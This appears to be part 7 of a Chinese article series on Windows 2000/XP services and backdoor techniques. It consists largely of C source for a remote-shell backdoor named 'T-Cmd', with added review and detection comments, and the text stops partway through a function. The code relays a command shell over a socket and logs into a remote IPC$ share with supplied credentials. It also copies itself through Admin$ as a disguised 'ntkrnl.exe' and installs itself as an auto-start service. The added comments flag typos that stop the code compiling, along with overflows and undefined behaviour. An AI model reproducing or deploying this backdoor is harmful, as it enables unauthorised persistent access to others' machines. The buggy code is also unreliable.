
Win2000/XP服务与后门技术(7)


Windows下的服务程序都遵循服务控制管理器(SCM)的接口标准,它们会在登录系统时自动运行,甚至在没有用户登录系统的情况下也会正常执行,类似于Unix系统中的守护进程(daemon)。

作者:TOo2y 来源:中华安全网 2008年1月5日

关键字: 后门技术 服务 Windows Windows xp


/*
 * ReadShell - relay thread, pipe -> socket.
 *
 * Reads whatever the session pipe (sdRead.hPipe) produces and forwards it
 * to the connected client socket (sdRead.sClient), inserting '\r' before a
 * bare '\n' on the way out.  Runs until the pipe can no longer be peeked or
 * a send() fails, then shuts down and closes the client socket.
 *
 * Parameters:
 *   lpParam - pointer to a SESSIONDATA; the struct is copied by value on entry.
 * Returns:
 *   always 0 (thread exit code).
 *
 * NOTE(review): the return type is written "DWord", which is not a Win32
 * type (presumably DWORD); as printed this line does not compile.
 *
 * Detection note: the fixed 256-byte banner below ("T-Cmd v1.0 beta, by
 * TOo2y") is sent to every client before any shell output, so it is a
 * static, high-confidence network signature for this particular tool.
 */
DWord WINAPI ReadShell(LPVOID lpParam)
{
/* Local copy of the session (pipe handle + client socket). */
SESSIONDATA sdRead=*(PSESSIONDATA)lpParam;
DWORD    dwBufferRead,dwBufferNow,dwBuffer2Send;
char     szBuffer[BUFFER_SIZE];
char     szBuffer2Send[BUFFER_SIZE+32];
/* PrevChar is never initialised; it is read in the '\n' test below before
 * the first assignment, so the very first iteration reads an indeterminate
 * value (undefined behaviour). */
char     PrevChar;
/* Both message arrays are 256 bytes; the part after the literal is
 * zero-filled and is sent as well, because send() is given a length of 256
 * rather than the string length. */
char     szStartMessage[256]="\r\n\r\n\t\t---[ T-Cmd v1.0 beta, by TOo2y ]---\r\n\t\t---[ E-mail: TOo2y@safechina.net ]---\r\n\t\t---[ HomePage: www.safechina.net ]---\r\n\t\t---[ Date: 02-05-2003      ]---\r\n\n";
    char     szHelpMessage[256]="\r\nEscape Character is 'CTRL+]'\r\n\n";

/* NOTE(review): "sClIEnt" differs in case from "sClient" used everywhere
 * else; as printed this is a different (undeclared) member name. */
     send(sdRead.sClIEnt,szStartMessage,256,0);
send(sdRead.sClient,szHelpMessage,256,0);

/* Poll the pipe; the loop ends when PeekNamedPipe itself fails
 * (e.g. the pipe's other end has gone away). */
while(PeekNamedPipe(sdRead.hPipe,szBuffer,BUFFER_SIZE,&dwBufferRead,NULL,NULL))
{    
if(dwBufferRead>0)
{
/* Drain up to BUFFER_SIZE bytes; dwBufferRead is overwritten with the
 * number actually read.  The ReadFile result is not checked. */
ReadFile(sdRead.hPipe,szBuffer,BUFFER_SIZE,&dwBufferRead,NULL);
}
else
{
/* Nothing pending: back off briefly and poll again. */
Sleep(10);
continue;
}

/* Copy szBuffer to szBuffer2Send, inserting '\r' before a '\n' that is
 * not already preceded by '\r'.  Two things worth knowing about this loop
 * as written: the inserted '\r' is stored into szBuffer (the input), not
 * szBuffer2Send, and the output index can advance up to twice as far as
 * the input index while szBuffer2Send is only BUFFER_SIZE+32 bytes. */
for(dwBufferNow=0,dwBuffer2Send=0;dwBufferNow<dwBufferRead;dwBufferNow++,dwBuffer2Send++)
{
if((szBuffer[dwBufferNow]=='\n') && (PrevChar!='\r'))
{
szBuffer[dwBuffer2Send++]='\r';
}
PrevChar=szBuffer[dwBufferNow];
szBuffer2Send[dwBuffer2Send]=szBuffer[dwBufferNow];
}

/* A failed send() ends the relay; the message goes to the debugger only. */
if(send(sdRead.sClient,szBuffer2Send,dwBuffer2Send,0)==SOCKET_ERROR)
{
OutputDebugString("Send in ReadShell Error !\n");
break;
}
Sleep(5);
}

/* 0x02 is SD_BOTH: stop both directions before closing the socket. */
shutdown(sdRead.sClient,0x02);  
closesocket(sdRead.sClient);
return 0;
}

/*
 * WriteShell - relay thread, socket -> pipe.
 *
 * Receives the client's input one byte at a time from sdWrite.sClient,
 * accumulates it into a line buffer, and writes each completed line (ended
 * by '\n') into the session pipe sdWrite.hPipe.  A line beginning with
 * "exit\r\n" (compared case-insensitively) ends the session without being
 * written to the pipe.
 *
 * Parameters:
 *   lpParam - pointer to a SESSIONDATA; copied by value on entry.
 * Returns:
 *   always 0 (thread exit code); the client socket is shut down and closed
 *   on every exit path.
 */
DWORD WINAPI WriteShell(LPVOID lpParam)
{
SESSIONDATA sdWrite=*(PSESSIONDATA)lpParam;
DWORD    dwBuffer2Write,dwBufferWritten;
char     szBuffer[1];
char     szBuffer2Write[BUFFER_SIZE];

dwBuffer2Write=0;  
/* Only a recv() result of exactly 0 (peer closed) ends this loop; a
 * SOCKET_ERROR return is non-zero and so does not. */
while(recv(sdWrite.sClient,szBuffer,1,0)!=0)
{
/* Append the byte; dwBuffer2Write is not checked against BUFFER_SIZE. */
szBuffer2Write[dwBuffer2Write++]=szBuffer[0];

/* Checked after every byte, so the comparison can read beyond the bytes
 * received so far (the buffer is not zero-initialised).  This test runs
 * before the '\n' handler below, so "exit" itself never reaches the pipe. */
if(strnicmp(szBuffer2Write,"exit\r\n",6)==0)
{
shutdown(sdWrite.sClient,0x02);    
closesocket(sdWrite.sClient);
return 0;
}

/* End of line: hand the accumulated bytes to the pipe and start over. */
if(szBuffer[0]=='\n')
{
if(WriteFile(sdWrite.hPipe,szBuffer2Write,dwBuffer2Write,&dwBufferWritten,NULL)==0)
{
OutputDebugString("WriteFile in WriteShell(Recv) Error !\n");
break;
}
dwBuffer2Write=0;
}
Sleep(10);
}

/* 0x02 is SD_BOTH. */
shutdown(sdWrite.sClient,0x02);
closesocket(sdWrite.sClient);
return 0;
}

/*
 * ConnectRemote - open or close an IPC$ connection to a remote host.
 *
 * With bConnect != FALSE, calls WNetAddConnection2 on "\\<lpHost>\ipc$"
 * using lpUserName/lpPassword, retrying after cancelling a connection the
 * system reports as already assigned or remembered.  With bConnect == FALSE,
 * cancels that connection.  Progress is printed to stdout.
 *
 * Parameters:
 *   bConnect   - TRUE to connect, FALSE to disconnect.
 *   lpHost     - remote host name or address (no length check; see sprintf).
 *   lpUserName - account name passed to WNetAddConnection2.
 *   lpPassword - password; the literal string "NULL" (any case) is turned
 *                into a NULL pointer, i.e. no explicit password.
 * Returns:
 *   TRUE on NO_ERROR, FALSE on any other WNet result.
 *
 * Detection note: on the target this shows up as an SMB session to the
 * IPC$ share under the supplied account (a network logon), which is the
 * artefact to look for when hunting for this kind of remote install.
 */
BOOL ConnectRemote(BOOL bConnect,char *lpHost,char *lpUserName,char *lpPassword)
{
char     lpIPC[256];
DWORD     dwErrorCode;
NETRESOURCE NetResource;

/* Unbounded format into a 256-byte buffer; lpHost is copied as-is. */
sprintf(lpIPC,"\\\\%s\\ipc$",lpHost);
/* Only these four members are set; the remaining NETRESOURCE fields are
 * left indeterminate (the struct is not zero-initialised). */
NetResource.lpLocalName = NULL;
NetResource.lpRemoteName = lpIPC;
NetResource.dwType   = RESOURCETYPE_ANY;
NetResource.lpProvider = NULL;

/* The string "NULL" is the caller's way of asking for no password. */
if(!stricmp(lpPassword,"NULL"))
{
lpPassword=NULL;
}

if(bConnect)
{
     printf("Now Connecting ...... ");
while(1)
{
     dwErrorCode=WNetAddConnection2(&NetResource,lpPassword,lpUserName,CONNECT_INTERACTIVE);
/* NOTE(review): the operator below is printed as two box-drawing bars
 * ("││"), not "||"; as shown on the page this line does not compile.
 * Intent: if a connection already exists, drop it and try again. */
       if((dwErrorCode==ERROR_ALREADY_ASSIGNED) ││ (dwErrorCode==ERROR_DEVICE_ALREADY_REMEMBERED))
{
   WNetCancelConnection2(lpIPC,CONNECT_UPDATE_PROFILE,TRUE);
}
     else if(dwErrorCode==NO_ERROR)
{
   printf("Success !\n");
      break;
}
    else
{
/* Any other error (bad credentials, host unreachable, ...) is fatal. */
printf("Failure !\n");  
       return FALSE;
}
     Sleep(10);
}
}
else
{
   printf("Now Disconnecting ... ");
dwErrorCode=WNetCancelConnection2(lpIPC,CONNECT_UPDATE_PROFILE,TRUE);
if(dwErrorCode==NO_ERROR)
{
printf("Success !\n");
}
else
{
printf("Failure !\n");
return FALSE;
}
}

return TRUE;
}

void InstallCmdService(char *lpHost)
{
SC_HANDLE    schSCManager;
SC_HANDLE    schService;
char       lpCurrentPath[MAX_PATH];
char       lpImagePath[MAX_PATH];
char       *lpHostName;
     WIN32_FIND_DATA FileData;
HANDLE     hSearch;
DWORD      dwErrorCode;
SERVICE_STATUS InstallServiceStatus;

if(lpHost==NULL)
{
GetSystemDirectory(lpImagePath,MAX_PATH);
strcat(lpImagePath,"\\ntkrnl.exe");
       lpHostName=NULL;
}
else
{
sprintf(lpImagePath,"\\\\%s\\Admin$\\system32\\ntkrnl.exe",lpHost);
lpHostName=(char *)malloc(256);
sprintf(lpHostName,"\\\\%s",lpHost);
}

printf("Transmitting File ... ");
hSearch=FindFirstFile(lpImagePath,&FileData);
if(hSearch==INVALID_HANDLE_VALUE)
{
GetModuleFileName(NULL,lpCurrentPath,MAX_PATH);
if(CopyFile(lpCurrentPath,lpImagePath,FALSE)==0)
{
dwErrorCode=GetLastError();
if(dwErrorCode==5)
{
printf("Failure ... Access is Denied !\n");
}
else
{
printf("Failure !\n");
}
      return ;
}
else
{
printf("Success !\n");
}
}
else
{
printf("already Exists !\n");
FindClose(hSearch);
}

schSCManager=OpenSCManager(lpHostName,NULL,SC_MANAGER_ALL_ACCESS);
     if(schSCManager==NULL)
{
printf("Open Service Control Manager Database Failure !\n");
return ;
}

printf("Creating Service .... ");
schService=CreateService(schSCManager,"ntkrnl","ntkrnl",SERVICE_ALL_ACCESS,
         SERVICE_WIN32_OWN_PROCESS,SERVICE_AUTO_START,
  SERVICE_ERROR_IGNORE,"ntkrnl.exe",NULL,NULL,NULL,NULL,NULL);
if(schService==NULL)
{
dwErrorCode=GetLastError();
if(dwErrorCode!=ERROR_SERVICE_EXISTS)
{
   printf("Failure !\n");
CloseServiceHandle(schSCManager);
   return ;
}
else
{
printf("already Exists !\n");
schService=OpenService(schSCManager,"ntkrnl",SERVICE_START);
if(schService==NULL)
{
printf("Opening Service .... Failure !\n");
CloseServiceHandle(schSCManager);
return ;
}
}
}
else
{
printf("Success !\n");
}

printf("Starting Service .... ");
if(StartService(schService,0,NULL)==0)
{
dwErrorCode=GetLastError();
if(dwErrorCode==ERROR_SERVICE_ALREADY_RUNNING)
{
printf("already Running !\n");
       CloseServiceHandle(schSCManager);
         CloseServiceHandle(schService);
         return ;
}
}
else
{
printf("Pending ... ");
}

while(QueryServiceStatus(schService,&InstallServiceStatus)!=0)
{
if(InstallServiceStatus.dwCurrentState==SERVICE_START_PENDING)
{
Sleep(100);
}
else
{
break;
}
}
if(InstallServiceStatus.dwCurrentState!=SERVICE_RUNNING)
{
printf("Failure !\n");
}
else
{
printf("Success !\n");
}
